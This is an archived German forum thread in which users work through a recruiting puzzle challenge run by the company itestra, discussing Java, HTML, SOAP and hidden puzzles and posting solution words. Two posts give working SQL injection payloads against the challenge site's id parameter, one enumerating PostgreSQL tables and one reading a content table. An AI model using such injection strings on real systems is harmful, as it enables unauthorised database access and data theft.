PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Challenge] by itestra



Keccak
16.05.2017, 20:19
Hallo alle zusammen.
Gerade eine Werbung von dem Unternehmen itestra gesehen, welches eine Challange anbietet um nach neuen Arbeitskräften zu suchen.
Ich dachte mir, ich veranstalte einfach mal daraus eine kleine Challange, die Rätsel zu knacken.
Es geht dabei um nichts weiteres als seine Skillz unter Beweis zu stellen (finde sowieso es gibt in letzter Zeit viel zu wenige challanges)
Der Link zu den Challanges ist: http://knack-den-code.itestra.de/


Wer eine Lösung findet, und sie teilen möchte bitte die SPOILER Tags verwenden!
Eventuell macht es auch Sinn, bei gefundener Lösung den gegangenen Weg zu beschreiben.
Ansonsten darf sich natürlich auch hier gerne in Thread ausgetauscht werden :)

Viel Spaß beim rätzeln

SecurityFlaw
16.05.2017, 23:35
Ist der Lösungsansatz auch in Ordnung?


http://knack-den-code.itestra.de/site.php?id=-1 UNION ALL SELECT NULL,NULL,(SELECT('~%20')||COALESCE(CAST(tablename AS CHARACTER(10000)),('1'))||'%20~' FROM pg_tables WHERE schemaname IN (('public')) OFFSET 1 LIMIT 1)-- x

Keccak
17.05.2017, 00:09
Hahaha, ich habe mir schon gedacht, das so was früher oder später kommt ;)
Klar, alles ist in Ordnung!
Ich selbst hänge gerade an den Verschlüsselungen...

SecurityFlaw
17.05.2017, 00:09
Kannst ja mal versuchen die Lösungswörter auszulesen. ^^

J0hn.X3r
17.05.2017, 00:11
Hatte schon auf deinen Post gewartet, nachdem ich gesehen hab, dass die id nicht richtig gefiltert wird ;)

SecurityFlaw
17.05.2017, 00:14
Man muss sich ja schliesslich anschauen auf was für Seiten man unterwegs ist!

Keccak
17.05.2017, 00:19
Kannst ja mal versuchen die Lösungswörter auszulesen. ^^

Könnte ich, aber in diesem Fall ist der Weg das Ziel.
Geht ja darum sich mit den verschiedenen Themen auseinanderzusetzten und so eine Lösungweg herauszufinden.

zzurc
17.05.2017, 01:02
Ich dachte ich wäre der einzige der das gefunden hat... hatte vor das morgen(heute - lol ich hab kein leben) genauer anzugucken und die Lösungen zu dumpen :D

---------- Post added at 02:02 ---------- Previous post was at 01:34 ----------

Scheint beabsichtigt zu sein.
ACHTUNG SPOILER

[1 entry]+---------------+
| text |
+---------------+
| TQZFI6vAqhj5y |
+---------------+

Keccak
17.05.2017, 06:40
Sehr gut cruzz! Das war eines der 4 "versteckten" Rätzel. Bleiben noch 3 versteckte Rätzel und 8 "standart" Rätzel.

zzurc
17.05.2017, 10:56
Ein weiteres "verstecktes" Lösungswort steht (ACHTUNG SPOILER) im Quellcode unten LoL

Lightningsoul
21.05.2017, 21:12
Hallo,
cool, dass man hier einen Thread zu dem Thema findet. Bin auch erst gestern in der U-Bahn auf die Werbung aufmerksam geworden. Da meine Freundin Java entwickelt, haben wir uns mal zuerst an die Javarätsel gewagt. Dabei ist leider das neuere fehlerbehaftet und lässt sich so nicht ausführen (t soll laut IDE ein Array sein, ist aber ein Object). Hat diesbezüglich jemand eine Idee? Das andere Rätsel in Java ist ein sehr verschachteltes Array wechsel dich Spielchen, wo wir auch nur bedingt weitergekommen sind.
Das mit dem HTML Quellcode war noch das Einfachste. Mit der SQL Abfrage habe ich auch schon viel probiert (Count auf die Tabellen) und Content auslesen:
http://knack-den-code.itestra.de/site.php?id=-11%3BSELECT%20CONTENT%20FROM%20CONTENT%20WHERE%20C ONTENT%20LIKE%20%27%SOAP%%27
(Sucht nach *SOAP* in der Spalte Content), aber da hab ich auch nicht mehr gefunden als zwei der Beiträge.

Das mit 404 check ich gar nicht. Egal was man da versucht, man findet die Seite net (https, ftp, mit htm, php ... endung etc.). Auch das rotieren der Seiten-IDs hilft gar nichts. :D

Aber sind schon witzige Rätsel. Vielleicht finden wir zusammen doch noch was raus.

Grüßle

_*~_
22.05.2017, 14:34
Dabei ist leider das neuere fehlerbehaftet und lässt sich so nicht ausführen (t soll laut IDE ein Array sein, ist aber ein Object).

Ich bin zwar kein großer Java Guru aber ich hab jetzt (ganz ohne Krücke…ähhhh…IDE) den Code und die Java 8 Docs ein bisschen studiert und ich weiß die Lösung.

Kleiner Tipp: https://docs.oracle.com/javase/8/docs/api/java/util/stream/Stream.html#collect-java.util.function.Supplier-java.util.function.BiConsumer-java.util.function.BiConsumer-

t ist das was auch immer der 'supplier' zurück gibt, in diesem Fall also ein Array.
Welchen Inhalt dieses Array hat und was damit gemacht wird, sollte nicht all zu schwer zu erkennen sein.

novedad
22.05.2017, 16:26
Da meine Freundin Java entwickelt

Wo findet man so eine Freundin? :D

Leange
22.05.2017, 22:29
Webservice ist einfach genug :P

http://www.soapclient.com/soaptest.html hier das wsdl file hochladen (habs auf pb gepackt https://pastebin.com/raw/pDi87zn4)
irgend nem namen eingeben, invoke und bam

5XAQt1uwin

Leange

P.S. http://knack-den-code.itestra.de/test/ gibts ... das einzige was sich auf den ersten blick ändert ist das Icon von der Schlüsselaustausch challenge ... vlt was verstecktes?